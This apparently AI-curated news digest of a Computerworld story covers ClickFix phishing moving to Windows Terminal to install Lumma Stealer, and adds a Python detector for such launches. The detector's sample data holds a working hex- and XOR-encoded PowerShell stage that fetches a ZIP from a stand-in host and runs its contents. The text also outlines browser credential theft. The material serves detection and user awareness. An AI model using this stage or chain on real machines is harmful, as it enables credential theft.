๐Ÿ–ฅ๏ธStalecollected in 2m

ClickFix Shifts to Windows Terminal Evasion

๐Ÿ–ฅ๏ธRead original on Computerworld

💡 Phishing now routes victims through Windows Terminal instead of the Run dialog, sidestepping Run-dialog-focused Defender detections and user training; protect Windows AI developer workstations.

⚡ 30-Second TL;DR

What Changed

Attackers instruct victims to press Win+X then I, which opens Windows Terminal (wt.exe), instead of the familiar Win+R Run dialog.

Why It Matters

Routing victims through Terminal raises the phishing success rate against Windows users and puts data on AI development workstations at risk. Enterprises must extend training beyond Run-dialog warnings, and endpoint detections tuned to Run-dialog abuse need refinement to cover wt.exe and the PowerShell instances it spawns.

What To Do Next

Update security training so users on dev machines know not to paste commands into Windows Terminal (or any console), not only the Run dialog.

Who should care: Enterprise & Security Teams

🧠 Deep Insight

Web-grounded analysis with 7 cited sources.

🔑 Enhanced Key Takeaways

  • The Windows Terminal variant deploys Lumma Stealer, using QueueUserAPC() injection into chrome.exe and msedge.exe processes to harvest browser credential stores such as the Web Data and Login Data databases.[1][2]
  • A parallel attack chain downloads a batch script to AppData\Local, writes a VBScript to %TEMP%, and leverages MSBuild as a LOLBin for execution.[1]
  • ClickFix emerged in 2024 as social engineering, delivered through malvertising and fake CAPTCHA pages, that tricks users into pasting commands into the Run dialog; it has since evolved to evade multi-line paste warnings.[5][6]

๐Ÿ› ๏ธ Technical Deep Dive

  • A hex-encoded, XOR-obfuscated PowerShell command pasted into wt.exe spawns additional Terminal/PowerShell instances that decode it, download a ZIP archive, and extract it with a renamed 7-Zip binary.[1]
  • The final payload in C:\ProgramData\app_config\ctjb uses QueueUserAPC() to inject into browser processes, targeting high-value artifacts for exfiltration.[2]
  • An alternative pathway uses reflective PE loading, API hashing, position-independent shellcode, and a PE downloader for memory-only execution that bypasses file-based detections.[3]
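The chain above (a shell spawned under Windows Terminal whose command line carries a hex-encoded, XOR-obfuscated stage) is the kind of thing a detection engineer would want to catch before the 7-Zip and injection steps run. The following Python is an added example, not code from the Computerworld article or from Microsoft's analysis: it scans constructed Sysmon-style process-creation events, flags shells launched under Windows Terminal, pulls long hex runs out of the command line and brute-forces every single-byte XOR key rather than assuming a known one, then reports the decoded stage and the indicators found in it. The process names (WindowsTerminal.exe as the resident process behind the wt.exe alias), the event layout, the sample command line and the single-byte XOR scheme are all assumptions made for the example; the real campaign's encoding details are not given on this page.

```python
"""Heuristic detector for ClickFix-style Windows Terminal abuse.

Added example, not code from the article or from Microsoft. The sample
telemetry below is constructed; the hex + single-byte XOR layout of the
pasted stage is an assumption, not the campaign's real format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation record, Sysmon Event ID 1 style (assumed layout)."""
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


# wt.exe is the app-execution alias; the resident process is WindowsTerminal.exe (assumption).
TERMINAL_HOSTS = {"wt.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# A long unprefixed run of hex digits: the shape of a hex-encoded stage.
HEX_BLOB = re.compile(r"(?<![0-9a-fA-F])([0-9a-fA-F]{32,})(?![0-9a-fA-F])")
# Substrings whose presence in the decoded stage is reported as an indicator.
INDICATORS = ("iex", "invoke-expression", "http", "downloadstring", "-bxor",
              "programdata", "7z", "expand-archive", "frombase64string")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def printable_ratio(data: bytes) -> float:
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data) if data else 0.0


def xor_bruteforce(data: bytes) -> Optional[Tuple[int, str]]:
    """Try every single-byte XOR key (key 0 covers plain hex encoding) and return
    (key, text) for the mostly-printable candidate with the most indicator hits."""
    best = None
    for key in range(256):
        plain = bytes(b ^ key for b in data)
        if printable_ratio(plain) < 0.95:
            continue
        text = plain.decode("ascii", errors="replace")
        score = sum(text.lower().count(tok) for tok in INDICATORS)
        if best is None or score > best[0]:
            best = (score, key, text)
    return None if best is None else (best[1], best[2])


def analyze(event: ProcEvent) -> Optional[Dict]:
    """Return a finding for Windows Terminal itself, or a shell spawned under it,
    whose command line carries a decodable hex stage with known indicators."""
    img, parent = basename(event.image), basename(event.parent_image)
    if not ((img in SHELLS and parent in TERMINAL_HOSTS) or img in TERMINAL_HOSTS):
        return None
    for blob in HEX_BLOB.findall(event.command_line):
        if len(blob) % 2:
            continue
        decoded = xor_bruteforce(bytes.fromhex(blob))
        if decoded is None:
            continue
        key, text = decoded
        hits = sorted({tok for tok in INDICATORS if tok in text.lower()})
        if hits:
            return {"pid": event.pid, "image": img, "parent": parent,
                    "xor_key": key, "stage": text, "indicators": hits}
    return None


def scan(events: List[ProcEvent]) -> List[Dict]:
    return [f for f in (analyze(e) for e in events) if f]


# --- constructed sample telemetry (not from the article or Microsoft) ---
# Plaintext stage: fetch a ZIP, extract it with a renamed 7-Zip ('x' = extract), run the dropped script.
STAGE = ("iwr https://cdn.example.invalid/pkg.zip -o $env:TEMP\\pkg.zip;"
         "& $env:TEMP\\xx.exe x $env:TEMP\\pkg.zip -oC:\\ProgramData\\app_config;"
         "iex (gc C:\\ProgramData\\app_config\\run.ps1 -Raw)")
KEY = 0x5A                                            # assumed single-byte XOR key
HEX = bytes(ord(c) ^ KEY for c in STAGE).hex()        # what the victim would paste
PASTED = (f"powershell -w hidden -c \"$h='{HEX}';"
          f"$b=[byte[]]-split($h -replace '..','0x$& ');"
          f"iex(-join($b|%{{[char]($_-bxor {KEY})}}))\"")
WT = r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_x64\WindowsTerminal.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    ProcEvent(4100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\winlogon.exe", "explorer.exe"),
    ProcEvent(4212, WT, r"C:\Windows\explorer.exe", "wt.exe"),          # Win+X -> I
    ProcEvent(4300, PS, WT, PASTED),                                    # pasted ClickFix stage
    ProcEvent(4350, PS, WT, "powershell.exe -NoLogo"),                  # benign interactive shell
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['image']} under {f['parent']} "
              f"xor_key=0x{f['xor_key']:02x} indicators={f['indicators']}")
```

The parent/child check is deliberately narrow (shell under Terminal, or Terminal itself) so the hex decoding only runs on the interactive launch path the article describes; in production you would feed it the same events a Win+R rule already consumes and tune the indicator list to the artifacts your own telemetry shows.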

🔮 Future Implications (AI analysis grounded in cited sources)

Defender detections for wt.exe abuse will increase by Q2 2026
Microsoft's February 2026 disclosure enables rapid signature updates, as seen in prior ClickFix variants leading to quick mitigations.[1][4]
ClickFix will keep rotating to other LOLBins beyond Windows Terminal
The January 2026 CrashFix variant already abused finger.exe, showing that attackers move on as soon as defenses focus on one launcher.[4]

โณ Timeline

2024-11
Proofpoint reports ClickFix social engineering flooding threat landscape via Run dialog and PowerShell.[6]
2025-08
Microsoft analyzes ClickFix technique using fake CAPTCHAs and Windows Run/Terminal for command execution.[5]
2026-01
Microsoft identifies CrashFix variant crashing browsers and abusing finger.exe for Python RAT deployment.[4]
2026-02
Microsoft uncovers Windows Terminal (Win+X → I) variant delivering Lumma Stealer via 7-Zip and process injection.[1][2]
2026-03
Computerworld publishes on ClickFix shift to Windows Terminal evasion with hex-encoded PowerShell chains.

AI-curated news aggregator. All content rights belong to original publishers.
Original source: Computerworld